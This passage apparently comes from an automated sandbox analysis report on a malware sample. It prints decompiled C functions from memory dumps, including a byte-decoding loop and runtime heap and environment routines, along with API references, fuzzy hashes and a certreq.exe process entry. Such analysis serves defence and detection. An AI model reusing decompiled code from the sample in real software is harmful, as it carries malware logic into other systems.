									 *((short*)(_t130 + _t91 * 4)) =  *_t119;
									 *(_t130 + 2 + _t91 * 4) = _t91;
									_t91 = _t91 + 1;
									_t119 = _t119 + 0xc;
								} while (_t91 < _t132);
							}
							E00414800(_t130, _t132, 4, E0040207F);
							_t136 = _t136 + 0x10;
							if(_t132 > 0) {
								_v52 = 0x80;
								_v51 = 0x40;
								_v50 = 0x20;
								_v49 = 0x10;
								_v48 = 8;
								_v47 = 4;
								_v46 = 2;
								_v45 = 1;
								_v44 = 0;
								_t34 = _t130 + 2; // 0x2
								_t107 = _t34;
								_v28 = _t132;
								do {
									_t112 = _v36 + (( *_t107 & 0x0000ffff) + ( *_t107 & 0x0000ffff) * 2) * 4;
									asm("cdq");
									_t133 = 2;
									_t134 = ( *_t112 & 0x000000ff) % _t133;
									if(_t134 != 0) {
										_t101 = _t112[9];
									} else {
										_t101 = _t112[8];
									}
									_v7 = _t101;
									if(_t134 != 0) {
										_t102 = _t112[8];
									} else {
										_t102 = _t112[9];
									}
									_v5 = _t102;
									_t103 =  &_v52;
									_v20 = _t112;
									_v20 = _v20 - _t103;
									_v6 = 0x80;
									do {
										if((_v6 & _v7) == _v6) {
											_t124 = _v20[_t103];
											if(_v5 != 0) {
												_t124 = _t124 ^ _v5;
											}
											_v16 = _v16 + 1;
											 *(_v16 + _a8) = _t124;
										}
										_t103 = _t103 + 1;
										_t116 =  *_t103;
										_v6 = _t116;
									} while (_t116 != 0);
									_t107 =  &(_t107[2]);
									_t69 =  &_v28;
									 *_t69 = _v28 - 1;
								} while ( *_t69 != 0);
							}
							HeapFree(_a4, 0, _t130);
							_v24 = _v24 + _v40;
							_t79 =  &(_v32[1]);
							_v32 = _t79;
							if( *_t79 != 0) {
								continue;
							}
						}
						break;
					}
				}
				asm("sbb eax, eax");
				return  !( ~(_v16 -  *0x41b590)) & _v16;
			}

0x00402096
0x004020a3
0x004020a8
0x004020ab
0x004020ae
0x004020b1
0x004020b3
0x004020b5
0x004020b5
0x004020ba
0x004020bb
0x004020b5
0x004020c0
0x004020c7
0x004020ce
0x004020d2
0x004020e0
0x004020e3
0x004020ea
0x004020eb
0x004020ee
0x004020f0
0x004020f5
0x004020f7
0x00000000
0x00000000
0x0040210c
0x00402110
0x00402116
0x0040211a
0x0040211c
0x0040211f
0x00402122
0x00402126
0x0040212b
0x0040212c
0x0040212f
0x0040211f
0x0040213c
0x00402141
0x00402146
0x0040214c
0x00402150
0x00402154
0x00402158
0x0040215c
0x00402160
0x00402164
0x00402168
0x0040216c
0x00402170
0x00402170
0x00402173
0x00402176
0x0040217f
0x00402187
0x00402188
0x0040218b
0x0040218f
0x00402196
0x00402191
0x00402191
0x00402191
0x0040219b
0x0040219e
0x004021a5
0x004021a0
0x004021a0
0x004021a0
0x004021a8
0x004021ab
0x004021ae
0x004021b3
0x004021b6
0x004021ba
0x004021c3
0x004021cc
0x004021cf
0x004021d1
0x004021d1
0x004021da
0x004021dd
0x004021dd
0x004021e0
0x004021e1
0x004021e5
0x004021e5
0x004021ea
0x004021ed
0x004021ed
0x004021ed
0x00402176
0x004021f8
0x00402201
0x00402208
0x0040220d
0x00402210
0x00000000
0x00000000
0x00402210
0x00000000
0x00402110
0x00402217
0x00402224
0x0040222c

APIs

HeapAlloc.KERNEL32(00000002,00000008,?), ref: 00402106
HeapFree.KERNEL32(00000002,00000000,00000000), ref: 004021F8

Strings

@, xrefs: 00402150
, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocFree
String ID: $@
API String ID: 1379380650-1077428164
Opcode ID: 25de4051bcc026e3433f15fab5d74b215f8311b7561810a204b3cd1293105156
Instruction ID: 03ebffd47cf5c996dfe729fa6c05f1bc99afa6ca3a74865f1c1130563c016752
Opcode Fuzzy Hash: 25de4051bcc026e3433f15fab5d74b215f8311b7561810a204b3cd1293105156
Instruction Fuzzy Hash: 0D51D630D042999BDF11CBA8C5556FEBFB0AF59304F0880EAD594BB3C1D3B94906C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 023E6C1C Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,023E5B32,?,00469BF8,00000060), ref: 023E6C4C
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,023E5B32,?,00469BF8,00000060), ref: 023E6CDD
GetEnvironmentStrings.KERNEL32(0041B2A0,00000000,?,?,?,?,023E5B32,?,00469BF8,00000060), ref: 023E6CF3
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 023E6D2F

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ErrorLast
String ID:
API String ID: 4216193871-0
Opcode ID: 8d8b59cb1fa31bc7721b7867b96de87f1a70d9364daa5b6d08e1a7d7bbcc4ee8
Instruction ID: 15eeaaaf7b52203a532c866e6ad856c7d286f863705aebee8fa72a73c63e6b1e
Opcode Fuzzy Hash: 8d8b59cb1fa31bc7721b7867b96de87f1a70d9364daa5b6d08e1a7d7bbcc4ee8
Instruction Fuzzy Hash: 703164B25042396FDF302F759CC993FBA9CEBA5298B01053AF143C3191E721AC4C8EA5

Uniqueness

Uniqueness Score: -1.00%

Function 023E6947 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

___initmbctable.LIBCMT ref: 023E6954
_strlen.LIBCMT ref: 023E696D
_strlen.LIBCMT ref: 023E69A6
_strcat.LIBCMT ref: 023E69C3

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: _strlen$___initmbctable_strcat
String ID:
API String ID: 109824703-0
Opcode ID: 1c3648c11878aea10d23cc1d42a615c2c49193575894f7a0e7cb616b56aee592
Instruction ID: 924376ab6e5b886060e2ad293c171f844c80b009cf272ca86eb4a56c45ebb00a
Opcode Fuzzy Hash: 1c3648c11878aea10d23cc1d42a615c2c49193575894f7a0e7cb616b56aee592
Instruction Fuzzy Hash: 3A1124B28041B44DDF356F20AC886397BAEAB21324310023EE0D7632D0EF31540DCF59

Uniqueness

Uniqueness Score: -1.00%

Function 00415AE0 Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00415AE0() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t5;
				signed int _t6;
				signed int _t11;
				signed int _t12;
				signed int _t13;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				intOrPtr _t32;

				_t32 =  *0x46d48c; // 0x1
				if(_t32 == 0) {
					_t5 = E00416C2C();
				}
				_t26 =  *0x46cc60; // 0x0
				_t24 = 0;
				if(_t26 != 0) {
					while(1) {
						_t6 =  *_t26;
						__eflags = _t6;
						if(_t6 == 0) {
							break;
						}
						__eflags = _t6 - 0x3d;
						if(_t6 != 0x3d) {
							_t24 = _t24 + 1;
							__eflags = _t24;
						}
						_t26 = _t26 + E004146E0(_t26) + 1;
					}
					_t5 = E00417CFF(4 + _t24 * 4);
					_t25 = _t5;
					__eflags = _t25;
					 *0x46cca0 = _t25;
					if(_t25 != 0) {
						_t27 =  *0x46cc60; // 0x0
						while(1) {
							__eflags =  *_t27;
							if(__eflags == 0) {
								break;
							}
							_t30 = E004146E0(_t27) + 1;
							__eflags =  *_t27 - 0x3d;
							if( *_t27 == 0x3d) {
								L14:
								_t27 = _t27 + _t30;
								__eflags = _t27;
								continue;
							}
							_t12 = E00417CFF(_t30);
							__eflags = _t12;
							 *_t25 = _t12;
							if(__eflags == 0) {
								_push( *0x46cca0);
								_t13 = E00416C4A(0, _t25, _t27, __eflags);
								 *0x46cca0 = 0;
								_t11 = _t13 | 0xffffffff;
								L17:
								return _t11;
							}
							E004174C0(_t12, _t27);
							_t25 = _t25 + 4;
							__eflags = _t25;
							goto L14;
						}
						_push( *0x46cc60);
						E00416C4A(0, _t25, _t27, __eflags);
						 *0x46cc60 = 0;
						 *_t25 = 0;
						 *0x46d480 = 1;
						_t11 = 0;
						__eflags = 0;
						goto L17;
					}
					goto L9;
				} else {
					L9:
					return _t5 | 0xffffffff;
				}
			}

0x00415ae3
0x00415aeb
0x00415aed
0x00415aed
0x00415af2
0x00415af8
0x00415afc
0x00415b10
0x00415b10
0x00415b12
0x00415b14
0x00000000
0x00000000
0x00415b00
0x00415b02
0x00415b04
0x00415b04
0x00415b04
0x00415b0c
0x00415b0c
0x00415b1e
0x00415b23
0x00415b25
0x00415b28
0x00415b2e
0x00415b35
0x00415b68
0x00415b68
0x00415b6a
0x00000000
0x00000000
0x00415b46
0x00415b47
0x00415b4b
0x00415b66
0x00415b66
0x00415b66
0x00000000
0x00415b66
0x00415b4e
0x00415b53
0x00415b56
0x00415b58
0x00415b91
0x00415b97
0x00415b9c
0x00415ba2
0x00415b8b
0x00000000
0x00415b8c
0x00415b5c
0x00415b63
0x00415b63
0x00000000
0x00415b63
0x00415b6c
0x00415b72
0x00415b77
0x00415b7d
0x00415b7f
0x00415b89
0x00415b89
0x00000000
0x00415b89
0x00000000
0x00415afe
0x00415b30
0x00000000
0x00415b30

APIs

___initmbctable.LIBCMT ref: 00415AED
_strlen.LIBCMT ref: 00415B06
_strlen.LIBCMT ref: 00415B3F
_strcat.LIBCMT ref: 00415B5C

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$___initmbctable_strcat
String ID:
API String ID: 109824703-0
Opcode ID: eba9b5e245c5d28c94089851c0169c8465657e42e0dd07df76f4d083cef2bbbc
Instruction ID: c5deeb11b035c186800b489a7279ee217502adbd2064c15e83cdad70560761a4
Opcode Fuzzy Hash: eba9b5e245c5d28c94089851c0169c8465657e42e0dd07df76f4d083cef2bbbc
Instruction Fuzzy Hash: CB11367290C5548ED7206F65AC845E63B94FB81368320023FE4C553291FF3C68C1D78E

Uniqueness

Uniqueness Score: -1.00%

Function 023E5DD0 Relevance: 6.1, APIs: 4, Instructions: 71memorythreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00469C4C,0041B2A0,00000000,023E5AFD,?,00469BF8,00000060), ref: 023E5DE8
FlsAlloc.KERNEL32(00414E22,?,00469BF8,00000060), ref: 023E5E64
FlsSetValue.KERNEL32(00000000,?,00469BF8,00000060), ref: 023E5E91
GetCurrentThreadId.KERNEL32 ref: 023E5EA5

Part of subcall function 023E5BFB: FlsFree.KERNEL32(0046C04C,023E5EBA,?,00469BF8,00000060), ref: 023E5C06

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: AllocCurrentFreeHandleModuleThreadValue
String ID:
API String ID: 711103338-0
Opcode ID: 8b7c47e17ce58013eedca00d505786845e0a0554910e3b00f710b853cb6b55b6
Instruction ID: 93a2bc167ac309a5ca611bc5eed2babe3cb04797b26ef98ee3db4e23c2e2b651
Opcode Fuzzy Hash: 8b7c47e17ce58013eedca00d505786845e0a0554910e3b00f710b853cb6b55b6
Instruction Fuzzy Hash: A82168706413119BCB21AF75AD8896A7FE5EB82B15310413AE499C32E0FFF48405CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 023E8F9E Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,0046D174,0046A0A8,023E958F), ref: 023E8FC5
RtlAllocateHeap.NTDLL(00000008,000041C4,00000000), ref: 023E8FFE
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 023E901C
HeapFree.KERNEL32(00000000,?), ref: 023E9033

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocate$AllocFreeVirtual
String ID:
API String ID: 94566200-0
Opcode ID: a480a9bd219db8592980576e4cbe0a50357f4879e30cbd840fbbc0721b2eedce
Instruction ID: 48e5eb822ff18e50d956dc5811610a33b777b084cab2655bf916a0a79de51b09
Opcode Fuzzy Hash: a480a9bd219db8592980576e4cbe0a50357f4879e30cbd840fbbc0721b2eedce
Instruction Fuzzy Hash: 39116070B00211AFCB308F19EC46AA67BB6FB497547504939F162C31F1E3B09845CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 023EA57B Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

___addl.LIBCMT ref: 023EA58A
___addl.LIBCMT ref: 023EA59E
___addl.LIBCMT ref: 023EA5B6
___addl.LIBCMT ref: 023EA5CE

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: ___addl
String ID:
API String ID: 2260456530-0
Opcode ID: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
Instruction ID: 4b01894f29ad3f614c58214b62db6396ff4adb70e3b3eeab39fc47a25c68eb06
Opcode Fuzzy Hash: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
Instruction Fuzzy Hash: 95F06D76500212AFDF205A45DC00EA6B7EAFF45300B044825FE9A824F0E722E86DCF51

Uniqueness

Uniqueness Score: -1.00%

Function 00419714 Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419714(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _t12;
				void* _t18;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t19 = _a8;
				_t12 = E004196F3( *_t20,  *_a8, _t20);
				_t22 = _t21 + 0xc;
				if(_t12 != 0) {
					_t18 = E004196F3( *((intOrPtr*)(_t20 + 4)), 1, _t20 + 4);
					_t22 = _t22 + 0xc;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
					}
				}
				if(E004196F3( *((intOrPtr*)(_t20 + 4)),  *((intOrPtr*)(_t19 + 4)), _t20 + 4) != 0) {
					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
				}
				return E004196F3( *((intOrPtr*)(_t20 + 8)),  *((intOrPtr*)(_t19 + 8)), _t20 + 8);
			}

0x00419715
0x0041971a
0x00419723
0x00419728
0x0041972d
0x00419737
0x0041973c
0x00419741
0x00419743
0x00419743
0x00419741
0x00419759
0x0041975b
0x0041975b
0x00419771

APIs

___addl.LIBCMT ref: 00419723
___addl.LIBCMT ref: 00419737
___addl.LIBCMT ref: 0041974F
___addl.LIBCMT ref: 00419767

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ___addl
String ID:
API String ID: 2260456530-0
Opcode ID: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
Instruction ID: 1d171e3fa0175c71018e5c8c149fee7a8dde4023b603e30444791bd1067818fc
Opcode Fuzzy Hash: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
Instruction Fuzzy Hash: D6F049B6400202EFDA105E52DC51EE7B7A9FF44344B04442BFD5882172E726EDA8CB61

Uniqueness

Uniqueness Score: -1.00%

Function 023E7627 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 023E7643

Strings

, xrefs: 023E766A
, xrefs: 023E7691

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 45581c97e52096858a7e84cd7efaf7d7dc71bdf66f104502a775ba1f75566a67
Instruction ID: 8e1992e1af23666a1a994a6b290914fe0e6e1d994a299303573d5d0560dbda48
Opcode Fuzzy Hash: 45581c97e52096858a7e84cd7efaf7d7dc71bdf66f104502a775ba1f75566a67
Instruction Fuzzy Hash: 6B413A30A043BC5EFF118B68DC5ABFABBA9DB46304F1404E0D546C71E2D3A18989DB95

Uniqueness

Uniqueness Score: -1.00%

Function 004167C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004167C0(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v21;
				signed char _v22;
				struct _cpinfo _v28;
				char _v284;
				char _v540;
				char _v796;
				char _v1308;
				void* __ebp;
				intOrPtr _t42;
				signed int _t45;
				char _t47;
				signed char _t48;
				signed int _t58;
				signed int _t59;
				signed int _t65;
				signed int _t68;
				signed char _t70;
				char _t71;
				signed int _t73;
				signed int _t74;
				signed char* _t78;
				signed char* _t79;
				void* _t81;
				void* _t86;
				void* _t87;

				_t80 = __edi;
				_t63 = __ebx;
				_t42 =  *0x46c5a0; // 0xfb090c04
				_v8 = _t42;
				if(GetCPInfo( *0x46d244,  &_v28) != 1) {
					_t45 = 0;
					__eflags = 0;
					do {
						__eflags = _t45 - 0x41;
						if(_t45 < 0x41) {
							L23:
							__eflags = _t45 - 0x61;
							if(_t45 < 0x61) {
								L26:
								 *(_t45 + 0x46d260) = 0;
							} else {
								__eflags = _t45 - 0x7a;
								if(_t45 > 0x7a) {
									goto L26;
								} else {
									 *(_t45 + 0x46d141) =  *(_t45 + 0x46d141) | 0x00000020;
									_t68 = _t45 - 0x20;
									goto L22;
								}
							}
						} else {
							__eflags = _t45 - 0x5a;
							if(_t45 > 0x5a) {
								goto L23;
							} else {
								 *(_t45 + 0x46d141) =  *(_t45 + 0x46d141) | 0x00000010;
								_t68 = _t45 + 0x20;
								__eflags = _t68;
								L22:
								 *(_t45 + 0x46d260) = _t68;
							}
						}
						_t45 = _t45 + 1;
						__eflags = _t45 - 0x100;
					} while (_t45 < 0x100);
				} else {
					_t47 = 0;
					do {
						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
						_t47 = _t47 + 1;
					} while (_t47 < 0x100);
					_t48 = _v22;
					_v284 = 0x20;
					if(_t48 != 0) {
						_push(__ebx);
						_t78 =  &_v21;
						_push(__edi);
						do {
							_t65 =  *_t78 & 0x000000ff;
							_t59 = _t48 & 0x000000ff;
							if(_t59 <= _t65) {
								_t73 = _t65 - _t59 + 1;
								_t74 = _t73 >> 2;
								_t81 = _t86 + _t59 - 0x118;
								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
								_t87 = _t87 + 0x18;
								_t65 = 0;
							}
							_t79 =  &(_t78[1]);
							_t48 =  *_t79;
							_t78 =  &(_t79[1]);
							_t96 = _t48;
						} while (_t48 != 0);
						_pop(_t80);
						_pop(_t63);
					}
					_push(0);
					_push( *0x46d12c);
					_push( *0x46d244);
					_push( &_v1308);
					_push(0x100);
					_push( &_v284);
					_push(1);
					E00419078(_t63, _t65, _t80, 0x100, _t96);
					_push(0);
					_push( *0x46d244);
					_push(0x100);
					_push( &_v540);
					_push(0x100);
					_push( &_v284);
					_push(0x100);
					_push( *0x46d12c);
					E004192C0(_t63, _t80, 0x100, _t96);
					_push(0);
					_push( *0x46d244);
					_push(0x100);
					_push( &_v796);
					_push(0x100);
					_push( &_v284);
					_push(0x200);
					_push( *0x46d12c);
					E004192C0(_t63, _t80, 0x100, _t96);
					_t58 = 0;
					do {
						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
						if((_t70 & 0x00000001) == 0) {
							__eflags = _t70 & 0x00000002;
							if((_t70 & 0x00000002) == 0) {
								 *((char*)(_t58 + 0x46d260)) = 0;
							} else {
								 *(_t58 + 0x46d141) =  *(_t58 + 0x46d141) | 0x00000020;
								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
								goto L12;
							}
						} else {
							 *(_t58 + 0x46d141) =  *(_t58 + 0x46d141) | 0x00000010;
							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
							L12:
							 *((char*)(_t58 + 0x46d260)) = _t71;
						}
						_t58 = _t58 + 1;
					} while (_t58 < 0x100);
				}
				return E00417786(_t45, _v8);
			}

0x004167c0
0x004167c0
0x004167c9
0x004167ce
0x004167ea
0x004168fd
0x004168fd
0x004168ff
0x004168ff
0x00416902
0x0041691d
0x0041691d
0x00416920
0x00416935
0x00416935
0x00416922
0x00416922
0x00416925
0x00000000
0x00416927
0x00416927
0x00416930
0x00000000
0x00416930
0x00416925
0x00416904
0x00416904
0x00416907
0x00000000
0x00416909
0x00416909
0x00416912
0x00416912
0x00416915
0x00416915
0x00416915
0x00416907
0x0041693c
0x0041693d
0x0041693d
0x004167f0
0x004167f0
0x004167f2
0x004167f2
0x004167f9
0x004167fa
0x004167fe
0x00416803
0x0041680a
0x0041680c
0x0041680d
0x00416810
0x00416811
0x00416811
0x00416814
0x00416819
0x0041681d
0x00416820
0x00416823
0x00416836
0x00416836
0x00416836
0x00416836
0x00416838
0x00416839
0x0041683b
0x0041683c
0x0041683c
0x00416840
0x00416841
0x00416841
0x00416842
0x00416844
0x00416850
0x00416856
0x00416857
0x0041685e
0x0041685f
0x00416861
0x00416866
0x00416868
0x00416874
0x00416875
0x00416876
0x0041687d
0x0041687e
0x0041687f
0x00416885
0x0041688a
0x0041688c
0x00416898
0x00416899
0x0041689a
0x004168a1
0x004168a2
0x004168a7
0x004168ad
0x004168b5
0x004168b7
0x004168b7
0x004168c2
0x004168da
0x004168dd
0x004168ef
0x004168df
0x004168df
0x004168e6
0x00000000
0x004168e6
0x004168c4
0x004168c4
0x004168cb
0x004168d2
0x004168d2
0x004168d2
0x004168f6
0x004168f7
0x004168fb
0x0041694b

APIs

GetCPInfo.KERNEL32(?,?), ref: 004167DC

Strings

, xrefs: 00416803
, xrefs: 0041682A

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 9948f742b9456c06369df4d6740a896b450d8a7c4c67dc17902c471bebc9bf2c
Instruction ID: d17b4f30b2d3daa1a03926271bb2ed6dac589c7d7822c4772cd149770c51ddb9
Opcode Fuzzy Hash: 9948f742b9456c06369df4d6740a896b450d8a7c4c67dc17902c471bebc9bf2c
Instruction Fuzzy Hash: C6418D71B0439C5FEB119B28DC69BFA3BA8DB06304F2404E6D585C7152D3A8C9C5DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0041522A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041522A(intOrPtr* __eax, char* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _t33;
				char* _t40;
				char* _t47;
				char* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				char* _t51;
				char _t52;
				intOrPtr* _t62;
				signed int _t63;
				signed int _t64;

				_t40 = __ebx;
				_t62 = __eax;
				if(_a12 != 0) {
					E0041520D((0 |  *__eax == 0x0000002d) + __ebx, 0 | _a4 > 0x00000000);
				}
				_t28 = _t40;
				if( *_t62 == 0x2d) {
					 *_t40 = 0x2d;
					_t28 = _t40 + 1;
				}
				if(_a4 > 0) {
					_t51 = _t28 + 1;
					 *_t28 =  *_t51;
					_t28 = _t51;
					_t52 =  *0x46c564; // 0x2e
					 *_t51 = _t52;
				}
				_t47 = E004174C0((0 | _a12 == 0x00000000) + _t28 + _a4, "e+000");
				if(_a8 != 0) {
					 *_t47 = 0x45;
				}
				_t48 = _t47 + 1;
				if( *((char*)( *((intOrPtr*)(_t62 + 0xc)))) != 0x30) {
					_t33 =  *((intOrPtr*)(_t62 + 4)) - 1;
					if(_t33 < 0) {
						_t33 =  ~_t33;
						 *_t48 = 0x2d;
					}
					_t49 = _t48 + 1;
					if(_t33 >= 0x64) {
						asm("cdq");
						_t64 = 0x64;
						 *_t49 =  *_t49 + _t33 / _t64;
						_t33 = _t33 % _t64;
					}
					_t50 = _t49 + 1;
					if(_t33 >= 0xa) {
						asm("cdq");
						_t63 = 0xa;
						 *_t50 =  *_t50 + _t33 / _t63;
						_t33 = _t33 % _t63;
					}
					 *((intOrPtr*)(_t50 + 1)) =  *((intOrPtr*)(_t50 + 1)) + _t33;
				}
				return _t40;
			}

0x0041522a
0x00415232
0x00415234
0x0041524d
0x00415252
0x00415256
0x00415258
0x0041525a
0x0041525d
0x0041525d
0x00415264
0x00415266
0x0041526b
0x0041526d
0x0041526f
0x00415275
0x00415275
0x00415295
0x00415297
0x00415299
0x00415299
0x0041529f
0x004152a3
0x004152a8
0x004152a9
0x004152ab
0x004152ad
0x004152ad
0x004152b0
0x004152b4
0x004152b6
0x004152b9
0x004152bc
0x004152be
0x004152be
0x004152c0
0x004152c4
0x004152c6
0x004152c9
0x004152cc
0x004152ce
0x004152ce
0x004152d0
0x004152d0
0x004152d7

APIs

__shift.LIBCMT ref: 0041524D

Part of subcall function 0041520D: _strlen.LIBCMT ref: 00415215

_strcat.LIBCMT ref: 0041528A

Strings

e+000, xrefs: 0041527C

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __shift_strcat_strlen
String ID: e+000
API String ID: 208078240-1027065040
Opcode ID: eec0680ef2e004e3429e862b4f7393b08ffcf6c552f3cca735ce0b00f0aff831
Instruction ID: b672325d6558a966edf98459febacb8385a141306d9a7ff52620e09e50e1a164
Opcode Fuzzy Hash: eec0680ef2e004e3429e862b4f7393b08ffcf6c552f3cca735ce0b00f0aff831
Instruction Fuzzy Hash: 9221C032209B948FD71A8A38DC907E63BD45B53358F2C44EFE085CB292E67DC985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00418137 Relevance: 5.1, APIs: 4, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418137() {
				signed int _t15;
				void* _t17;
				void* _t18;
				intOrPtr* _t20;
				void* _t24;
				signed int _t26;
				void* _t27;
				intOrPtr* _t30;

				_t15 =  *0x46d114; // 0x0
				_t26 =  *0x46d124; // 0x0
				if(_t15 != _t26) {
					L4:
					_t27 =  *0x46d118; // 0x0
					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x46d360, 8, 0x41c4);
					 *(_t30 + 0x10) = _t17;
					if(_t17 != 0) {
						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
						 *(_t30 + 0xc) = _t18;
						if(_t18 != 0) {
							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
							 *_t30 = 0;
							 *((intOrPtr*)(_t30 + 4)) = 0;
							 *0x46d114 =  *0x46d114 + 1;
							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
							_t20 = _t30;
						} else {
							HeapFree( *0x46d360, 0,  *(_t30 + 0x10));
							goto L5;
						}
					} else {
						L5:
						_t20 = 0;
					}
					return _t20;
				} else {
					_t2 = _t26 * 4; // 0x50
					_t24 = HeapReAlloc( *0x46d360, 0,  *0x46d118, _t26 + _t2 + 0x50 << 2);
					if(_t24 != 0) {
						 *0x46d124 =  *0x46d124 + 0x10;
						 *0x46d118 = _t24;
						_t15 =  *0x46d114; // 0x0
						goto L4;
					} else {
						return 0;
					}
				}
			}

0x00418137
0x0041813c
0x00418147
0x0041817d
0x0041817d
0x00418194
0x00418197
0x0041819f
0x004181a2
0x004181b5
0x004181bd
0x004181c0
0x004181d4
0x004181d8
0x004181da
0x004181dd
0x004181e6
0x004181e9
0x004181c2
0x004181cc
0x00000000
0x004181cc
0x004181a4
0x004181a4
0x004181a4
0x004181a4
0x004181ed
0x00418149
0x00418149
0x0041815e
0x00418166
0x0041816c
0x00418173
0x00418178
0x00000000
0x00418168
0x0041816b
0x0041816b
0x00418166

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00418728,00000000,?,00000000), ref: 0041815E
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00418728,00000000,?,00000000), ref: 00418197
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004181B5
HeapFree.KERNEL32(00000000,?), ref: 004181CC

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: a480a9bd219db8592980576e4cbe0a50357f4879e30cbd840fbbc0721b2eedce
Instruction ID: 54ac33142fd3509e86b2a7e9053ed6ef6c12928d870525576ac90f1ffcb0e1ee
Opcode Fuzzy Hash: a480a9bd219db8592980576e4cbe0a50357f4879e30cbd840fbbc0721b2eedce
Instruction Fuzzy Hash: 4B119031B00200AFC7208F19EC469A27BB1F789714710462EF562C31B0E7F09882CB5A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: certreq.exePID: 7032, Parent PID: 3452COMMON

Executed Functions

Function 00000188240D30A7 Relevance: 10.9, APIs: 7, Instructions: 390memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00000188240D37E8
